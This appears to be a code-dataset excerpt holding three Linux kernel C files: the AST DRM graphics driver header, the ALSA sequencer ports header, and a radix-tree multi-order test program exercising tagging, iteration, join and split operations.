text
stringlengths
2
100k
meta
dict
/* * Copyright 2012 Red Hat Inc. * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sub license, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS, AUTHORS AND/OR ITS SUPPLIERS BE LIABLE FOR ANY CLAIM, * DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR * OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE * USE OR OTHER DEALINGS IN THE SOFTWARE. * * The above copyright notice and this permission notice (including the * next paragraph) shall be included in all copies or substantial portions * of the Software. * */ /* * Authors: Dave Airlie <airlied@redhat.com> */ #ifndef __AST_DRV_H__ #define __AST_DRV_H__ #include <drm/drm_encoder.h> #include <drm/drm_fb_helper.h> #include <drm/ttm/ttm_bo_api.h> #include <drm/ttm/ttm_bo_driver.h> #include <drm/ttm/ttm_placement.h> #include <drm/ttm/ttm_memory.h> #include <drm/ttm/ttm_module.h> #include <drm/drm_gem.h> #include <linux/i2c.h> #include <linux/i2c-algo-bit.h> #define DRIVER_AUTHOR "Dave Airlie" #define DRIVER_NAME "ast" #define DRIVER_DESC "AST" #define DRIVER_DATE "20120228" #define DRIVER_MAJOR 0 #define DRIVER_MINOR 1 #define DRIVER_PATCHLEVEL 0 #define PCI_CHIP_AST2000 0x2000 #define PCI_CHIP_AST2100 0x2010 #define PCI_CHIP_AST1180 0x1180 enum ast_chip { AST2000, AST2100, AST1100, AST2200, AST2150, AST2300, AST2400, AST2500, AST1180, }; enum ast_tx_chip { AST_TX_NONE, AST_TX_SIL164, AST_TX_ITE66121, AST_TX_DP501, }; #define AST_DRAM_512Mx16 0 #define AST_DRAM_1Gx16 1 #define AST_DRAM_512Mx32 2 #define AST_DRAM_1Gx32 3 #define AST_DRAM_2Gx16 6 #define AST_DRAM_4Gx16 7 #define AST_DRAM_8Gx16 8 struct ast_fbdev; struct ast_private { struct drm_device *dev; void __iomem *regs; void __iomem *ioregs; enum ast_chip chip; bool vga2_clone; uint32_t dram_bus_width; uint32_t dram_type; uint32_t mclk; uint32_t vram_size; struct ast_fbdev *fbdev; int fb_mtrr; struct { struct drm_global_reference mem_global_ref; struct ttm_bo_global_ref bo_global_ref; struct ttm_bo_device bdev; } ttm; struct drm_gem_object *cursor_cache; uint64_t cursor_cache_gpu_addr; /* Acces to this cache is protected by the crtc->mutex of the only crtc * we have. */ struct ttm_bo_kmap_obj cache_kmap; int next_cursor; bool support_wide_screen; enum { ast_use_p2a, ast_use_dt, ast_use_defaults } config_mode; enum ast_tx_chip tx_chip_type; u8 dp501_maxclk; u8 *dp501_fw_addr; const struct firmware *dp501_fw; /* dp501 fw */ }; int ast_driver_load(struct drm_device *dev, unsigned long flags); void ast_driver_unload(struct drm_device *dev); struct ast_gem_object; #define AST_IO_AR_PORT_WRITE (0x40) #define AST_IO_MISC_PORT_WRITE (0x42) #define AST_IO_VGA_ENABLE_PORT (0x43) #define AST_IO_SEQ_PORT (0x44) #define AST_IO_DAC_INDEX_READ (0x47) #define AST_IO_DAC_INDEX_WRITE (0x48) #define AST_IO_DAC_DATA (0x49) #define AST_IO_GR_PORT (0x4E) #define AST_IO_CRTC_PORT (0x54) #define AST_IO_INPUT_STATUS1_READ (0x5A) #define AST_IO_MISC_PORT_READ (0x4C) #define AST_IO_MM_OFFSET (0x380) #define __ast_read(x) \ static inline u##x ast_read##x(struct ast_private *ast, u32 reg) { \ u##x val = 0;\ val = ioread##x(ast->regs + reg); \ return val;\ } __ast_read(8); __ast_read(16); __ast_read(32) #define __ast_io_read(x) \ static inline u##x ast_io_read##x(struct ast_private *ast, u32 reg) { \ u##x val = 0;\ val = ioread##x(ast->ioregs + reg); \ return val;\ } __ast_io_read(8); __ast_io_read(16); __ast_io_read(32); #define __ast_write(x) \ static inline void ast_write##x(struct ast_private *ast, u32 reg, u##x val) {\ iowrite##x(val, ast->regs + reg);\ } __ast_write(8); __ast_write(16); __ast_write(32); #define __ast_io_write(x) \ static inline void ast_io_write##x(struct ast_private *ast, u32 reg, u##x val) {\ iowrite##x(val, ast->ioregs + reg);\ } __ast_io_write(8); __ast_io_write(16); #undef __ast_io_write static inline void ast_set_index_reg(struct ast_private *ast, uint32_t base, uint8_t index, uint8_t val) { ast_io_write16(ast, base, ((u16)val << 8) | index); } void ast_set_index_reg_mask(struct ast_private *ast, uint32_t base, uint8_t index, uint8_t mask, uint8_t val); uint8_t ast_get_index_reg(struct ast_private *ast, uint32_t base, uint8_t index); uint8_t ast_get_index_reg_mask(struct ast_private *ast, uint32_t base, uint8_t index, uint8_t mask); static inline void ast_open_key(struct ast_private *ast) { ast_set_index_reg(ast, AST_IO_CRTC_PORT, 0x80, 0xA8); } #define AST_VIDMEM_SIZE_8M 0x00800000 #define AST_VIDMEM_SIZE_16M 0x01000000 #define AST_VIDMEM_SIZE_32M 0x02000000 #define AST_VIDMEM_SIZE_64M 0x04000000 #define AST_VIDMEM_SIZE_128M 0x08000000 #define AST_VIDMEM_DEFAULT_SIZE AST_VIDMEM_SIZE_8M #define AST_MAX_HWC_WIDTH 64 #define AST_MAX_HWC_HEIGHT 64 #define AST_HWC_SIZE (AST_MAX_HWC_WIDTH*AST_MAX_HWC_HEIGHT*2) #define AST_HWC_SIGNATURE_SIZE 32 #define AST_DEFAULT_HWC_NUM 2 /* define for signature structure */ #define AST_HWC_SIGNATURE_CHECKSUM 0x00 #define AST_HWC_SIGNATURE_SizeX 0x04 #define AST_HWC_SIGNATURE_SizeY 0x08 #define AST_HWC_SIGNATURE_X 0x0C #define AST_HWC_SIGNATURE_Y 0x10 #define AST_HWC_SIGNATURE_HOTSPOTX 0x14 #define AST_HWC_SIGNATURE_HOTSPOTY 0x18 struct ast_i2c_chan { struct i2c_adapter adapter; struct drm_device *dev; struct i2c_algo_bit_data bit; }; struct ast_connector { struct drm_connector base; struct ast_i2c_chan *i2c; }; struct ast_crtc { struct drm_crtc base; struct drm_gem_object *cursor_bo; uint64_t cursor_addr; int cursor_width, cursor_height; u8 offset_x, offset_y; }; struct ast_encoder { struct drm_encoder base; }; struct ast_framebuffer { struct drm_framebuffer base; struct drm_gem_object *obj; }; struct ast_fbdev { struct drm_fb_helper helper; struct ast_framebuffer afb; void *sysram; int size; struct ttm_bo_kmap_obj mapping; int x1, y1, x2, y2; /* dirty rect */ spinlock_t dirty_lock; }; #define to_ast_crtc(x) container_of(x, struct ast_crtc, base) #define to_ast_connector(x) container_of(x, struct ast_connector, base) #define to_ast_encoder(x) container_of(x, struct ast_encoder, base) #define to_ast_framebuffer(x) container_of(x, struct ast_framebuffer, base) struct ast_vbios_stdtable { u8 misc; u8 seq[4]; u8 crtc[25]; u8 ar[20]; u8 gr[9]; }; struct ast_vbios_enhtable { u32 ht; u32 hde; u32 hfp; u32 hsync; u32 vt; u32 vde; u32 vfp; u32 vsync; u32 dclk_index; u32 flags; u32 refresh_rate; u32 refresh_rate_index; u32 mode_id; }; struct ast_vbios_dclk_info { u8 param1; u8 param2; u8 param3; }; struct ast_vbios_mode_info { const struct ast_vbios_stdtable *std_table; const struct ast_vbios_enhtable *enh_table; }; extern int ast_mode_init(struct drm_device *dev); extern void ast_mode_fini(struct drm_device *dev); int ast_framebuffer_init(struct drm_device *dev, struct ast_framebuffer *ast_fb, const struct drm_mode_fb_cmd2 *mode_cmd, struct drm_gem_object *obj); int ast_fbdev_init(struct drm_device *dev); void ast_fbdev_fini(struct drm_device *dev); void ast_fbdev_set_suspend(struct drm_device *dev, int state); void ast_fbdev_set_base(struct ast_private *ast, unsigned long gpu_addr); struct ast_bo { struct ttm_buffer_object bo; struct ttm_placement placement; struct ttm_bo_kmap_obj kmap; struct drm_gem_object gem; struct ttm_place placements[3]; int pin_count; }; #define gem_to_ast_bo(gobj) container_of((gobj), struct ast_bo, gem) static inline struct ast_bo * ast_bo(struct ttm_buffer_object *bo) { return container_of(bo, struct ast_bo, bo); } #define to_ast_obj(x) container_of(x, struct ast_gem_object, base) #define AST_MM_ALIGN_SHIFT 4 #define AST_MM_ALIGN_MASK ((1 << AST_MM_ALIGN_SHIFT) - 1) extern int ast_dumb_create(struct drm_file *file, struct drm_device *dev, struct drm_mode_create_dumb *args); extern void ast_gem_free_object(struct drm_gem_object *obj); extern int ast_dumb_mmap_offset(struct drm_file *file, struct drm_device *dev, uint32_t handle, uint64_t *offset); #define DRM_FILE_PAGE_OFFSET (0x100000000ULL >> PAGE_SHIFT) int ast_mm_init(struct ast_private *ast); void ast_mm_fini(struct ast_private *ast); int ast_bo_create(struct drm_device *dev, int size, int align, uint32_t flags, struct ast_bo **pastbo); int ast_gem_create(struct drm_device *dev, u32 size, bool iskernel, struct drm_gem_object **obj); int ast_bo_pin(struct ast_bo *bo, u32 pl_flag, u64 *gpu_addr); int ast_bo_unpin(struct ast_bo *bo); static inline int ast_bo_reserve(struct ast_bo *bo, bool no_wait) { int ret; ret = ttm_bo_reserve(&bo->bo, true, no_wait, NULL); if (ret) { if (ret != -ERESTARTSYS && ret != -EBUSY) DRM_ERROR("reserve failed %p\n", bo); return ret; } return 0; } static inline void ast_bo_unreserve(struct ast_bo *bo) { ttm_bo_unreserve(&bo->bo); } void ast_ttm_placement(struct ast_bo *bo, int domain); int ast_bo_push_sysram(struct ast_bo *bo); int ast_mmap(struct file *filp, struct vm_area_struct *vma); /* ast post */ void ast_enable_vga(struct drm_device *dev); void ast_enable_mmio(struct drm_device *dev); bool ast_is_vga_enabled(struct drm_device *dev); void ast_post_gpu(struct drm_device *dev); u32 ast_mindwm(struct ast_private *ast, u32 r); void ast_moutdwm(struct ast_private *ast, u32 r, u32 v); /* ast dp501 */ void ast_set_dp501_video_output(struct drm_device *dev, u8 mode); bool ast_backup_fw(struct drm_device *dev, u8 *addr, u32 size); bool ast_dp501_read_edid(struct drm_device *dev, u8 *ediddata); u8 ast_get_dp501_max_clk(struct drm_device *dev); void ast_init_3rdtx(struct drm_device *dev); void ast_release_firmware(struct drm_device *dev); #endif
{ "language": "C" }
/* * ALSA sequencer Ports * Copyright (c) 1998 by Frank van de Pol <fvdpol@coil.demon.nl> * * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA * */ #ifndef __SND_SEQ_PORTS_H #define __SND_SEQ_PORTS_H #include <sound/seq_kernel.h> #include "seq_lock.h" /* list of 'exported' ports */ /* Client ports that are not exported are still accessible, but are anonymous ports. If a port supports SUBSCRIPTION, that port can send events to all subscribersto a special address, with address (queue==SNDRV_SEQ_ADDRESS_SUBSCRIBERS). The message is then send to all recipients that are registered in the subscription list. A typical application for these SUBSCRIPTION events is handling of incoming MIDI data. The port doesn't 'know' what other clients are interested in this message. If for instance a MIDI recording application would like to receive the events from that port, it will first have to subscribe with that port. */ struct snd_seq_subscribers { struct snd_seq_port_subscribe info; /* additional info */ struct list_head src_list; /* link of sources */ struct list_head dest_list; /* link of destinations */ atomic_t ref_count; }; struct snd_seq_port_subs_info { struct list_head list_head; /* list of subscribed ports */ unsigned int count; /* count of subscribers */ unsigned int exclusive: 1; /* exclusive mode */ struct rw_semaphore list_mutex; rwlock_t list_lock; int (*open)(void *private_data, struct snd_seq_port_subscribe *info); int (*close)(void *private_data, struct snd_seq_port_subscribe *info); }; struct snd_seq_client_port { struct snd_seq_addr addr; /* client/port number */ struct module *owner; /* owner of this port */ char name[64]; /* port name */ struct list_head list; /* port list */ snd_use_lock_t use_lock; /* subscribers */ struct snd_seq_port_subs_info c_src; /* read (sender) list */ struct snd_seq_port_subs_info c_dest; /* write (dest) list */ int (*event_input)(struct snd_seq_event *ev, int direct, void *private_data, int atomic, int hop); void (*private_free)(void *private_data); void *private_data; unsigned int callback_all : 1; unsigned int closing : 1; unsigned int timestamping: 1; unsigned int time_real: 1; int time_queue; /* capability, inport, output, sync */ unsigned int capability; /* port capability bits */ unsigned int type; /* port type bits */ /* supported channels */ int midi_channels; int midi_voices; int synth_voices; }; struct snd_seq_client; /* return pointer to port structure and lock port */ struct snd_seq_client_port *snd_seq_port_use_ptr(struct snd_seq_client *client, int num); /* search for next port - port is locked if found */ struct snd_seq_client_port *snd_seq_port_query_nearest(struct snd_seq_client *client, struct snd_seq_port_info *pinfo); /* unlock the port */ #define snd_seq_port_unlock(port) snd_use_lock_free(&(port)->use_lock) /* create a port, port number is returned (-1 on failure) */ struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client, int port_index); /* delete a port */ int snd_seq_delete_port(struct snd_seq_client *client, int port); /* delete all ports */ int snd_seq_delete_all_ports(struct snd_seq_client *client); /* set port info fields */ int snd_seq_set_port_info(struct snd_seq_client_port *port, struct snd_seq_port_info *info); /* get port info fields */ int snd_seq_get_port_info(struct snd_seq_client_port *port, struct snd_seq_port_info *info); /* add subscriber to subscription list */ int snd_seq_port_connect(struct snd_seq_client *caller, struct snd_seq_client *s, struct snd_seq_client_port *sp, struct snd_seq_client *d, struct snd_seq_client_port *dp, struct snd_seq_port_subscribe *info); /* remove subscriber from subscription list */ int snd_seq_port_disconnect(struct snd_seq_client *caller, struct snd_seq_client *s, struct snd_seq_client_port *sp, struct snd_seq_client *d, struct snd_seq_client_port *dp, struct snd_seq_port_subscribe *info); /* subscribe port */ int snd_seq_port_subscribe(struct snd_seq_client_port *port, struct snd_seq_port_subscribe *info); /* get matched subscriber */ struct snd_seq_subscribers *snd_seq_port_get_subscription(struct snd_seq_port_subs_info *src_grp, struct snd_seq_addr *dest_addr); #endif
{ "language": "C" }
/* * multiorder.c: Multi-order radix tree entry testing * Copyright (c) 2016 Intel Corporation * Author: Ross Zwisler <ross.zwisler@linux.intel.com> * Author: Matthew Wilcox <matthew.r.wilcox@intel.com> * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. */ #include <linux/radix-tree.h> #include <linux/slab.h> #include <linux/errno.h> #include "test.h" #define for_each_index(i, base, order) \ for (i = base; i < base + (1 << order); i++) static void __multiorder_tag_test(int index, int order) { RADIX_TREE(tree, GFP_KERNEL); int base, err, i; /* our canonical entry */ base = index & ~((1 << order) - 1); printv(2, "Multiorder tag test with index %d, canonical entry %d\n", index, base); err = item_insert_order(&tree, index, order); assert(!err); /* * Verify we get collisions for covered indices. We try and fail to * insert an exceptional entry so we don't leak memory via * item_insert_order(). */ for_each_index(i, base, order) { err = __radix_tree_insert(&tree, i, order, (void *)(0xA0 | RADIX_TREE_EXCEPTIONAL_ENTRY)); assert(err == -EEXIST); } for_each_index(i, base, order) { assert(!radix_tree_tag_get(&tree, i, 0)); assert(!radix_tree_tag_get(&tree, i, 1)); } assert(radix_tree_tag_set(&tree, index, 0)); for_each_index(i, base, order) { assert(radix_tree_tag_get(&tree, i, 0)); assert(!radix_tree_tag_get(&tree, i, 1)); } assert(tag_tagged_items(&tree, NULL, 0, ~0UL, 10, 0, 1) == 1); assert(radix_tree_tag_clear(&tree, index, 0)); for_each_index(i, base, order) { assert(!radix_tree_tag_get(&tree, i, 0)); assert(radix_tree_tag_get(&tree, i, 1)); } assert(radix_tree_tag_clear(&tree, index, 1)); assert(!radix_tree_tagged(&tree, 0)); assert(!radix_tree_tagged(&tree, 1)); item_kill_tree(&tree); } static void __multiorder_tag_test2(unsigned order, unsigned long index2) { RADIX_TREE(tree, GFP_KERNEL); unsigned long index = (1 << order); index2 += index; assert(item_insert_order(&tree, 0, order) == 0); assert(item_insert(&tree, index2) == 0); assert(radix_tree_tag_set(&tree, 0, 0)); assert(radix_tree_tag_set(&tree, index2, 0)); assert(tag_tagged_items(&tree, NULL, 0, ~0UL, 10, 0, 1) == 2); item_kill_tree(&tree); } static void multiorder_tag_tests(void) { int i, j; /* test multi-order entry for indices 0-7 with no sibling pointers */ __multiorder_tag_test(0, 3); __multiorder_tag_test(5, 3); /* test multi-order entry for indices 8-15 with no sibling pointers */ __multiorder_tag_test(8, 3); __multiorder_tag_test(15, 3); /* * Our order 5 entry covers indices 0-31 in a tree with height=2. * This is broken up as follows: * 0-7: canonical entry * 8-15: sibling 1 * 16-23: sibling 2 * 24-31: sibling 3 */ __multiorder_tag_test(0, 5); __multiorder_tag_test(29, 5); /* same test, but with indices 32-63 */ __multiorder_tag_test(32, 5); __multiorder_tag_test(44, 5); /* * Our order 8 entry covers indices 0-255 in a tree with height=3. * This is broken up as follows: * 0-63: canonical entry * 64-127: sibling 1 * 128-191: sibling 2 * 192-255: sibling 3 */ __multiorder_tag_test(0, 8); __multiorder_tag_test(190, 8); /* same test, but with indices 256-511 */ __multiorder_tag_test(256, 8); __multiorder_tag_test(300, 8); __multiorder_tag_test(0x12345678UL, 8); for (i = 1; i < 10; i++) for (j = 0; j < (10 << i); j++) __multiorder_tag_test2(i, j); } static void multiorder_check(unsigned long index, int order) { unsigned long i; unsigned long min = index & ~((1UL << order) - 1); unsigned long max = min + (1UL << order); void **slot; struct item *item2 = item_create(min, order); RADIX_TREE(tree, GFP_KERNEL); printv(2, "Multiorder index %ld, order %d\n", index, order); assert(item_insert_order(&tree, index, order) == 0); for (i = min; i < max; i++) { struct item *item = item_lookup(&tree, i); assert(item != 0); assert(item->index == index); } for (i = 0; i < min; i++) item_check_absent(&tree, i); for (i = max; i < 2*max; i++) item_check_absent(&tree, i); for (i = min; i < max; i++) assert(radix_tree_insert(&tree, i, item2) == -EEXIST); slot = radix_tree_lookup_slot(&tree, index); free(*slot); radix_tree_replace_slot(&tree, slot, item2); for (i = min; i < max; i++) { struct item *item = item_lookup(&tree, i); assert(item != 0); assert(item->index == min); } assert(item_delete(&tree, min) != 0); for (i = 0; i < 2*max; i++) item_check_absent(&tree, i); } static void multiorder_shrink(unsigned long index, int order) { unsigned long i; unsigned long max = 1 << order; RADIX_TREE(tree, GFP_KERNEL); struct radix_tree_node *node; printv(2, "Multiorder shrink index %ld, order %d\n", index, order); assert(item_insert_order(&tree, 0, order) == 0); node = tree.rnode; assert(item_insert(&tree, index) == 0); assert(node != tree.rnode); assert(item_delete(&tree, index) != 0); assert(node == tree.rnode); for (i = 0; i < max; i++) { struct item *item = item_lookup(&tree, i); assert(item != 0); assert(item->index == 0); } for (i = max; i < 2*max; i++) item_check_absent(&tree, i); if (!item_delete(&tree, 0)) { printv(2, "failed to delete index %ld (order %d)\n", index, order); abort(); } for (i = 0; i < 2*max; i++) item_check_absent(&tree, i); } static void multiorder_insert_bug(void) { RADIX_TREE(tree, GFP_KERNEL); item_insert(&tree, 0); radix_tree_tag_set(&tree, 0, 0); item_insert_order(&tree, 3 << 6, 6); item_kill_tree(&tree); } void multiorder_iteration(void) { RADIX_TREE(tree, GFP_KERNEL); struct radix_tree_iter iter; void **slot; int i, j, err; printv(1, "Multiorder iteration test\n"); #define NUM_ENTRIES 11 int index[NUM_ENTRIES] = {0, 2, 4, 8, 16, 32, 34, 36, 64, 72, 128}; int order[NUM_ENTRIES] = {1, 1, 2, 3, 4, 1, 0, 1, 3, 0, 7}; for (i = 0; i < NUM_ENTRIES; i++) { err = item_insert_order(&tree, index[i], order[i]); assert(!err); } for (j = 0; j < 256; j++) { for (i = 0; i < NUM_ENTRIES; i++) if (j <= (index[i] | ((1 << order[i]) - 1))) break; radix_tree_for_each_slot(slot, &tree, &iter, j) { int height = order[i] / RADIX_TREE_MAP_SHIFT; int shift = height * RADIX_TREE_MAP_SHIFT; unsigned long mask = (1UL << order[i]) - 1; struct item *item = *slot; assert((iter.index | mask) == (index[i] | mask)); assert(iter.shift == shift); assert(!radix_tree_is_internal_node(item)); assert((item->index | mask) == (index[i] | mask)); assert(item->order == order[i]); i++; } } item_kill_tree(&tree); } void multiorder_tagged_iteration(void) { RADIX_TREE(tree, GFP_KERNEL); struct radix_tree_iter iter; void **slot; int i, j; printv(1, "Multiorder tagged iteration test\n"); #define MT_NUM_ENTRIES 9 int index[MT_NUM_ENTRIES] = {0, 2, 4, 16, 32, 40, 64, 72, 128}; int order[MT_NUM_ENTRIES] = {1, 0, 2, 4, 3, 1, 3, 0, 7}; #define TAG_ENTRIES 7 int tag_index[TAG_ENTRIES] = {0, 4, 16, 40, 64, 72, 128}; for (i = 0; i < MT_NUM_ENTRIES; i++) assert(!item_insert_order(&tree, index[i], order[i])); assert(!radix_tree_tagged(&tree, 1)); for (i = 0; i < TAG_ENTRIES; i++) assert(radix_tree_tag_set(&tree, tag_index[i], 1)); for (j = 0; j < 256; j++) { int k; for (i = 0; i < TAG_ENTRIES; i++) { for (k = i; index[k] < tag_index[i]; k++) ; if (j <= (index[k] | ((1 << order[k]) - 1))) break; } radix_tree_for_each_tagged(slot, &tree, &iter, j, 1) { unsigned long mask; struct item *item = *slot; for (k = i; index[k] < tag_index[i]; k++) ; mask = (1UL << order[k]) - 1; assert((iter.index | mask) == (tag_index[i] | mask)); assert(!radix_tree_is_internal_node(item)); assert((item->index | mask) == (tag_index[i] | mask)); assert(item->order == order[k]); i++; } } assert(tag_tagged_items(&tree, NULL, 0, ~0UL, TAG_ENTRIES, 1, 2) == TAG_ENTRIES); for (j = 0; j < 256; j++) { int mask, k; for (i = 0; i < TAG_ENTRIES; i++) { for (k = i; index[k] < tag_index[i]; k++) ; if (j <= (index[k] | ((1 << order[k]) - 1))) break; } radix_tree_for_each_tagged(slot, &tree, &iter, j, 2) { struct item *item = *slot; for (k = i; index[k] < tag_index[i]; k++) ; mask = (1 << order[k]) - 1; assert((iter.index | mask) == (tag_index[i] | mask)); assert(!radix_tree_is_internal_node(item)); assert((item->index | mask) == (tag_index[i] | mask)); assert(item->order == order[k]); i++; } } assert(tag_tagged_items(&tree, NULL, 1, ~0UL, MT_NUM_ENTRIES * 2, 1, 0) == TAG_ENTRIES); i = 0; radix_tree_for_each_tagged(slot, &tree, &iter, 0, 0) { assert(iter.index == tag_index[i]); i++; } item_kill_tree(&tree); } /* * Basic join checks: make sure we can't find an entry in the tree after * a larger entry has replaced it */ static void multiorder_join1(unsigned long index, unsigned order1, unsigned order2) { unsigned long loc; void *item, *item2 = item_create(index + 1, order1); RADIX_TREE(tree, GFP_KERNEL); item_insert_order(&tree, index, order2); item = radix_tree_lookup(&tree, index); radix_tree_join(&tree, index + 1, order1, item2); loc = find_item(&tree, item); if (loc == -1) free(item); item = radix_tree_lookup(&tree, index + 1); assert(item == item2); item_kill_tree(&tree); } /* * Check that the accounting of exceptional entries is handled correctly * by joining an exceptional entry to a normal pointer. */ static void multiorder_join2(unsigned order1, unsigned order2) { RADIX_TREE(tree, GFP_KERNEL); struct radix_tree_node *node; void *item1 = item_create(0, order1); void *item2; item_insert_order(&tree, 0, order2); radix_tree_insert(&tree, 1 << order2, (void *)0x12UL); item2 = __radix_tree_lookup(&tree, 1 << order2, &node, NULL); assert(item2 == (void *)0x12UL); assert(node->exceptional == 1); item2 = radix_tree_lookup(&tree, 0); free(item2); radix_tree_join(&tree, 0, order1, item1); item2 = __radix_tree_lookup(&tree, 1 << order2, &node, NULL); assert(item2 == item1); assert(node->exceptional == 0); item_kill_tree(&tree); } /* * This test revealed an accounting bug for exceptional entries at one point. * Nodes were being freed back into the pool with an elevated exception count * by radix_tree_join() and then radix_tree_split() was failing to zero the * count of exceptional entries. */ static void multiorder_join3(unsigned int order) { RADIX_TREE(tree, GFP_KERNEL); struct radix_tree_node *node; void **slot; struct radix_tree_iter iter; unsigned long i; for (i = 0; i < (1 << order); i++) { radix_tree_insert(&tree, i, (void *)0x12UL); } radix_tree_join(&tree, 0, order, (void *)0x16UL); rcu_barrier(); radix_tree_split(&tree, 0, 0); radix_tree_for_each_slot(slot, &tree, &iter, 0) { radix_tree_iter_replace(&tree, &iter, slot, (void *)0x12UL); } __radix_tree_lookup(&tree, 0, &node, NULL); assert(node->exceptional == node->count); item_kill_tree(&tree); } static void multiorder_join(void) { int i, j, idx; for (idx = 0; idx < 1024; idx = idx * 2 + 3) { for (i = 1; i < 15; i++) { for (j = 0; j < i; j++) { multiorder_join1(idx, i, j); } } } for (i = 1; i < 15; i++) { for (j = 0; j < i; j++) { multiorder_join2(i, j); } } for (i = 3; i < 10; i++) { multiorder_join3(i); } } static void check_mem(unsigned old_order, unsigned new_order, unsigned alloc) { struct radix_tree_preload *rtp = &radix_tree_preloads; if (rtp->nr != 0) printv(2, "split(%u %u) remaining %u\n", old_order, new_order, rtp->nr); /* * Can't check for equality here as some nodes may have been * RCU-freed while we ran. But we should never finish with more * nodes allocated since they should have all been preloaded. */ if (nr_allocated > alloc) printv(2, "split(%u %u) allocated %u %u\n", old_order, new_order, alloc, nr_allocated); } static void __multiorder_split(int old_order, int new_order) { RADIX_TREE(tree, GFP_ATOMIC); void **slot; struct radix_tree_iter iter; unsigned alloc; struct item *item; radix_tree_preload(GFP_KERNEL); assert(item_insert_order(&tree, 0, old_order) == 0); radix_tree_preload_end(); /* Wipe out the preloaded cache or it'll confuse check_mem() */ radix_tree_cpu_dead(0); item = radix_tree_tag_set(&tree, 0, 2); radix_tree_split_preload(old_order, new_order, GFP_KERNEL); alloc = nr_allocated; radix_tree_split(&tree, 0, new_order); check_mem(old_order, new_order, alloc); radix_tree_for_each_slot(slot, &tree, &iter, 0) { radix_tree_iter_replace(&tree, &iter, slot, item_create(iter.index, new_order)); } radix_tree_preload_end(); item_kill_tree(&tree); free(item); } static void __multiorder_split2(int old_order, int new_order) { RADIX_TREE(tree, GFP_KERNEL); void **slot; struct radix_tree_iter iter; struct radix_tree_node *node; void *item; __radix_tree_insert(&tree, 0, old_order, (void *)0x12); item = __radix_tree_lookup(&tree, 0, &node, NULL); assert(item == (void *)0x12); assert(node->exceptional > 0); radix_tree_split(&tree, 0, new_order); radix_tree_for_each_slot(slot, &tree, &iter, 0) { radix_tree_iter_replace(&tree, &iter, slot, item_create(iter.index, new_order)); } item = __radix_tree_lookup(&tree, 0, &node, NULL); assert(item != (void *)0x12); assert(node->exceptional == 0); item_kill_tree(&tree); } static void __multiorder_split3(int old_order, int new_order) { RADIX_TREE(tree, GFP_KERNEL); void **slot; struct radix_tree_iter iter; struct radix_tree_node *node; void *item; __radix_tree_insert(&tree, 0, old_order, (void *)0x12); item = __radix_tree_lookup(&tree, 0, &node, NULL); assert(item == (void *)0x12); assert(node->exceptional > 0); radix_tree_split(&tree, 0, new_order); radix_tree_for_each_slot(slot, &tree, &iter, 0) { radix_tree_iter_replace(&tree, &iter, slot, (void *)0x16); } item = __radix_tree_lookup(&tree, 0, &node, NULL); assert(item == (void *)0x16); assert(node->exceptional > 0); item_kill_tree(&tree); __radix_tree_insert(&tree, 0, old_order, (void *)0x12); item = __radix_tree_lookup(&tree, 0, &node, NULL); assert(item == (void *)0x12); assert(node->exceptional > 0); radix_tree_split(&tree, 0, new_order); radix_tree_for_each_slot(slot, &tree, &iter, 0) { if (iter.index == (1 << new_order)) radix_tree_iter_replace(&tree, &iter, slot, (void *)0x16); else radix_tree_iter_replace(&tree, &iter, slot, NULL); } item = __radix_tree_lookup(&tree, 1 << new_order, &node, NULL); assert(item == (void *)0x16); assert(node->count == node->exceptional); do { node = node->parent; if (!node) break; assert(node->count == 1); assert(node->exceptional == 0); } while (1); item_kill_tree(&tree); } static void multiorder_split(void) { int i, j; for (i = 3; i < 11; i++) for (j = 0; j < i; j++) { __multiorder_split(i, j); __multiorder_split2(i, j); __multiorder_split3(i, j); } } static void multiorder_account(void) { RADIX_TREE(tree, GFP_KERNEL); struct radix_tree_node *node; void **slot; item_insert_order(&tree, 0, 5); __radix_tree_insert(&tree, 1 << 5, 5, (void *)0x12); __radix_tree_lookup(&tree, 0, &node, NULL); assert(node->count == node->exceptional * 2); radix_tree_delete(&tree, 1 << 5); assert(node->exceptional == 0); __radix_tree_insert(&tree, 1 << 5, 5, (void *)0x12); __radix_tree_lookup(&tree, 1 << 5, &node, &slot); assert(node->count == node->exceptional * 2); __radix_tree_replace(&tree, node, slot, NULL, NULL, NULL); assert(node->exceptional == 0); item_kill_tree(&tree); } void multiorder_checks(void) { int i; for (i = 0; i < 20; i++) { multiorder_check(200, i); multiorder_check(0, i); multiorder_check((1UL << i) + 1, i); } for (i = 0; i < 15; i++) multiorder_shrink((1UL << (i + RADIX_TREE_MAP_SHIFT)), i); multiorder_insert_bug(); multiorder_tag_tests(); multiorder_iteration(); multiorder_tagged_iteration(); multiorder_join(); multiorder_split(); multiorder_account(); radix_tree_cpu_dead(0); } int __weak main(void) { radix_tree_init(); multiorder_checks(); return 0; }
{ "language": "C" }
